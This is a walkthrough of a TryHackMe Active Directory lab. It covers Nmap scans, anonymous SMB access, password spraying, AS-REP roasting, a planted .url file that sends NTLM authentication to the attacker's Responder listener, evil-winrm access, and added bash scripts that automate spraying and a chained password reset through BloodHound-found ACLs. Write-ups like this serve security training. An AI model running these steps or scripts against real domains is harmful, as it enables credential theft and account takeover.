#tryhackme #activedirectory #hard

# Information Gathering - Nmap

I began by scanning all TCP ports with Nmap.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-20 13:11 EDT
Nmap scan report for 10.10.94.108
Host is up (0.20s latency).
Not shown: 65513 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
7680/tcp  open  pando-pub
9389/tcp  open  adws
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown
49673/tcp open  unknown
49676/tcp open  unknown
49702/tcp open  unknown
52619/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 43.99 seconds
```

Then I ran a second Nmap scan against the open ports, this time with `-sCV` (default scripts plus version detection) for more detail.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sCV $IP -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,7680,9389,52619
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-20 13:18 EDT
Nmap scan report for 10.10.94.108
Host is up (0.20s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-20 17:18:18Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: thm.corp0., Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
3389/tcp  open     ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2025-07-20T17:19:50+00:00; 0s from scanner time.
| rdp-ntlm-info:
|   Target_Name: THM
|   NetBIOS_Domain_Name: THM
|   NetBIOS_Computer_Name: HAYSTACK
|   DNS_Domain_Name: thm.corp
|   DNS_Computer_Name: HayStack.thm.corp
|   DNS_Tree_Name: thm.corp
|   Product_Version: 10.0.17763
|_  System_Time: 2025-07-20T17:19:09+00:00
| ssl-cert: Subject: commonName=HayStack.thm.corp
| Not valid before: 2025-07-19T17:01:22
|_Not valid after:  2026-01-18T17:01:22
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  filtered pando-pub
9389/tcp  open     mc-nmf        .NET Message Framing
52619/tcp open     msrpc         Microsoft Windows RPC
Service Info: Host: HAYSTACK; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-07-20T17:19:13
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 106.45 seconds
```

The service mix (DNS, Kerberos, LDAP and Global Catalog, SMB, WinRM, ADWS) says this is a domain controller for `thm.corp`, hostname `HayStack`, running build 17763 (Windows Server 2019). Two details worth noting for later: the Kerberos server time is reported, so clock skew can be checked before any Kerberos-based attack, and SMB signing is enabled and required, which rules out NTLM relay against this host.

Lastly, a UDP scan against the top 10 ports:

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-20 13:22 EDT
Nmap scan report for 10.10.94.108
Host is up (0.22s latency).

PORT     STATE         SERVICE
53/udp   open          domain
67/udp   open|filtered dhcps
123/udp  open          ntp
135/udp  open|filtered msrpc
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
161/udp  open|filtered snmp
445/udp  open|filtered microsoft-ds
631/udp  open|filtered ipp
1434/udp open|filtered ms-sql-m

Nmap done: 1 IP address (1 host up) scanned in 2.19 seconds
```

# Enumeration

##### Port 139 445 - SMB

I usually try to enumerate the file-sharing protocols first. I checked whether SMB shares could be listed anonymously with `smbclient`, and the share `Data` stood out because it is not one of the default shares.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient -N -L //$IP

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	Data            Disk
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.94.108 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

Inside the share there was a single directory, `onboarding`, and I downloaded every file in it. Note that the null session (`-N`) was enough to read the share, which is already a misconfiguration worth recording.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient -N //$IP/Data
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jul 19 04:40:57 2023
  ..                                  D        0  Wed Jul 19 04:40:57 2023
  onboarding                          D        0  Sun Jul 20 13:24:25 2025

		7863807 blocks of size 4096. 3002300 blocks available
smb: \>
```

One of the downloaded files revealed an important piece of information: an initial password for `Lily Oneill`'s company account.

![[Pasted image 20250720123428.png]]

The initial password from the note was `ResetMe123!`.

Running `nxc smb thm.corp -u guest -p '' --rid-brute | grep SidTypeUser` (RID cycling over the guest null session) showed that the user `LILY ONEILL` exists in the domain with the SAM account name `LILY_ONEILL`.

![[Pasted image 20250720131821.png]]

I filtered the output down to bare usernames and saved them to a file.

![[Pasted image 20250720132750.png]]

Then I confirmed with `Kerbrute` that these users actually exist and are valid in the domain.
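The two steps above (turning the `--rid-brute` output into a username list, then validating it) are easy to script. The following is an added example, not part of the original writeup: the sample `nxc` lines are constructed to match the `<RID>: <DOMAIN>\<name> (<SidType>)` shape that `nxc --rid-brute` prints, and the `kerbrute`/`nxc` invocations at the end are commented because they need the target reachable over the VPN.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): turn `nxc ... --rid-brute`
# output into a bare username list suitable for kerbrute and password spraying.
#
# Constructed sample input, shaped like nxc's rid-brute output. The RIDs and
# the non-page accounts (Administrator, Domain Users, HAYSTACK$) are assumptions;
# only LILY_ONEILL and TABATHA_BRITT appear in the writeup itself.
SAMPLE_RID_BRUTE='SMB         10.10.94.108    445    HAYSTACK         500: THM\Administrator (SidTypeUser)
SMB         10.10.94.108    445    HAYSTACK         513: THM\Domain Users (SidTypeGroup)
SMB         10.10.94.108    445    HAYSTACK         1000: THM\HAYSTACK$ (SidTypeUser)
SMB         10.10.94.108    445    HAYSTACK         1106: THM\TABATHA_BRITT (SidTypeUser)
SMB         10.10.94.108    445    HAYSTACK         1105: THM\LILY_ONEILL (SidTypeUser)'

# rid_users: read rid-brute output on stdin and print one username per line.
#  1. keep only SidTypeUser rows (groups and aliases are useless for spraying)
#  2. strip everything up to and including the DOMAIN\ prefix, and the trailing
#     " (SidTypeUser)"
#  3. drop machine accounts (names ending in $), which never take a user password
#  4. de-duplicate and sort in the C locale so the order is deterministic
rid_users() {
    grep 'SidTypeUser' \
      | sed -E 's/.*: [^\\]+\\(.*) \(SidTypeUser\)$/\1/' \
      | grep -v '\$$' \
      | LC_ALL=C sort -u
}

# Offline demonstration on the constructed sample.
printf '%s\n' "$SAMPLE_RID_BRUTE" | rid_users

# Against the real target (VPN up, kerbrute and nxc installed):
#   nxc smb thm.corp -u guest -p '' --rid-brute | rid_users > users.txt
#   kerbrute userenum -d thm.corp --dc 10.10.94.108 users.txt
#   nxc smb thm.corp -u users.txt -p 'ResetMe123!' --continue-on-success
```

`--continue-on-success` matters for the spray: without it `nxc` stops at the first valid login, and a default password reused across several onboarding accounts would be missed.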
![[Pasted image 20250720135043.png]]

I then password-sprayed the username list with the password found earlier against SMB. `LILY_ONEILL` came back as valid again, but the account did not appear to have any privileges beyond guest, so we need to keep enumerating.

# Exploitation - Initial Access

Next I performed AS-REP Roasting with Impacket's `GetNPUsers.py` against the user list, looking for accounts with Kerberos pre-authentication disabled, and obtained hashes for three users: `Ernesto Silva`, `Tabatha Britt`, and `Leann Long`.

![[Pasted image 20250720141210.png]]

`Hashcat` (mode 18200 for AS-REP etype 23 hashes) cracked the hash of user `Tabatha Britt`.

![[Pasted image 20250720142844.png]]

Now that we have valid credentials, we can open an RDP session with `xfreerdp3`. I successfully logged in as `tabatha_britt`. However, I couldn't find much of interest on the system as `tabatha_britt`, so let's keep enumerating.

![[Pasted image 20250720143208.png]]

I recalled that we had both `READ` and `WRITE` permissions on the SMB `Data` share. Since we can write to it, I'll attempt an SCF-style file attack using a `.url` file: when anyone browses the folder in Explorer, Windows tries to fetch the shortcut's icon from the UNC path in `IconFile` and authenticates to it with NTLM, which we can capture.

![[Pasted image 20250720145316.png]]

I generated the `.url` file that will be uploaded to the share as our payload. The address in `IconFile` is our attacking machine, where Responder will be listening; `%USERNAME%` is expanded on the victim, so the requested filename tells us who triggered it.

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ cat icon.url
[InternetShortcut]
URL=any
WorkingDirectory=any
IconFile=\\10.13.89.243\%USERNAME%.icon
IconIndex=1
```

I started `responder` to listen for the resulting authentication, then uploaded the `.url` file into the `onboarding` directory.

```bash
smb: \> cd onboarding
smb: \onboarding\> dir
  .                                   D        0  Sun Jul 20 16:40:58 2025
  ..                                  D        0  Sun Jul 20 16:40:58 2025
  ejgs0yxf.uip.pdf                    A  3032659  Mon Jul 17 04:12:09 2023
  icon.url                            A      100  Sun Jul 20 16:37:57 2025
  obsuye24.tef.pdf                    A  4700896  Mon Jul 17 04:11:53 2023
  yismddkx.0rv.txt                    A      521  Mon Aug 21 14:21:59 2023

		7863807 blocks of size 4096. 3009154 blocks available
```

Within seconds of uploading the `.url` file, my Responder listener captured an `NTLMv2` hash.

![[Pasted image 20250720153918.png]]

`hashcat` uses mode 5600 for `NetNTLMv2`. I cracked the hash and obtained the password. A captured NetNTLMv2 response cannot be replayed as a pass-the-hash credential, so cracking (or relaying) is the only option, and relaying to this host is off the table because the Nmap scan showed SMB signing is required.

![[Pasted image 20250720154950.png]]

`nxc` confirmed that the credentials of user `automate` are valid against WinRM.

![[Pasted image 20250720155327.png]]

I successfully logged into the system as user `automate` via `evil-winrm`.

![[Pasted image 20250720155521.png]]

Found `user.txt` in `C:\Users\automate\Desktop`.

![[Pasted image 20250720155617.png]]

# Privilege Escalation

I spent a fair amount of time enumerating the Windows host itself but couldn't find a privilege-escalation path there. Since this is an AD-based room, I used `bloodhound-python` from my Kali machine to map out the domain and hopefully surface some attack paths for privesc.

![[Pasted image 20250720202729.png]]

Upload the `.zip` file generated by the `bloodhound-python` collector.

![[Pasted image 20250720204008.png]]

After exploring the graph for a while, I found that one of the users discovered earlier, `TABATHA_BRITT`, has `GenericAll` over two users: `SHAWNA_BRAY` and `RAQUEL_BENSON`. Simply put, `GenericAll` means `TABATHA_BRITT` has full control over those user objects, which includes resetting their passwords.

![[Pasted image 20250720204810.png]]

![[Pasted image 20250720205132.png]]

Moreover, `SHAWNA_BRAY` has the ability to change `CRUZ_HALL`'s password.

![[Pasted image 20250720210106.png]]

Finally, `CRUZ_HALL` has `GenericWrite` and `ForceChangePassword` over `DARLA_WINTERS`.

![[Pasted image 20250720210226.png]]

That gives us a chain of users whose passwords we are going to change, one hop at a time, starting from the `tabatha_britt` credential we already hold. Let's get to work.
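The chain above is mechanical once the order is fixed: each hop resets the next user's password and then authenticates as that user for the following hop. The script below is an added example, not part of the original writeup, and uses Samba's `net rpc password` (package `samba-common-bin` on Kali) as the tool of choice; the page itself does not say which tool it used. The DC address and domain are from the scans; `tabatha_britt`'s cracked password is only visible in a screenshot on the page, so it is passed in via `TABATHA_PASS`, and the new password `Ch41nR3set#2025` is an assumption. It defaults to a dry run that only prints the commands.

```bash
#!/usr/bin/env bash
# Added example (not from the original writeup): walk the BloodHound ACL chain
#   TABATHA_BRITT --GenericAll--> SHAWNA_BRAY --change pw--> CRUZ_HALL
#                 --ForceChangePassword--> DARLA_WINTERS
# by resetting each next user's password over SAMR with `net rpc password`,
# authenticating as the user whose password was set in the previous hop.
#
# Assumptions (not from the page): the new password value, the use of `net rpc`,
# and that the starting password is supplied in TABATHA_PASS.
DC="${DC:-10.10.94.108}"            # from the Nmap scan
DOMAIN="${DOMAIN:-thm.corp}"        # from the LDAP/RDP banners
NEW_PASS="${NEW_PASS:-Ch41nR3set#2025}"
DRY_RUN="${DRY_RUN:-1}"             # set DRY_RUN=0 to really change passwords

# reset_password ACTOR ACTOR_PASS TARGET NEW_PASS
# `net rpc password <user> <newpass>` sets the password of <user> using the
# SAMR right that GenericAll / ForceChangePassword grants to ACTOR.
# In dry-run mode the command is printed with the actor's password masked.
reset_password() {
    actor="$1"; actor_pass="$2"; target="$3"; new_pass="$4"
    if [ "$DRY_RUN" = "1" ]; then
        printf 'net rpc password %s %s -U %s/%s%%*** -S %s\n' \
            "$target" "$new_pass" "$DOMAIN" "$actor" "$DC"
    else
        net rpc password "$target" "$new_pass" -U "$DOMAIN/$actor%$actor_pass" -S "$DC"
    fi
}

# run_chain START_USER START_PASS TARGET1 [TARGET2 ...]
# Order matters: every hop uses the credential produced by the previous one.
# Prints one line per hop plus a final line with the last credential obtained.
run_chain() {
    [ "$#" -ge 3 ] || { echo "usage: run_chain USER PASS TARGET..." >&2; return 2; }
    actor="$1"; pass="$2"; shift 2
    for target in "$@"; do
        reset_password "$actor" "$pass" "$target" "$NEW_PASS" || return 1
        actor="$target"; pass="$NEW_PASS"
    done
    printf 'final credential: %s:%s\n' "$actor" "$pass"
}

# Demonstration: the chain found in BloodHound, as a dry run unless DRY_RUN=0.
run_chain TABATHA_BRITT "${TABATHA_PASS:-cracked-password-here}" \
    SHAWNA_BRAY CRUZ_HALL DARLA_WINTERS
```

Two practitioner notes: password resets are destructive and noisy (the users lose access and the DC logs event 4724 for each reset), which is fine on a lab box but on a real engagement `GenericWrite` would more often be abused via targeted Kerberoasting or shadow credentials instead; and if a hop fails, do not continue, because the next hop would be authenticating with a password that was never set.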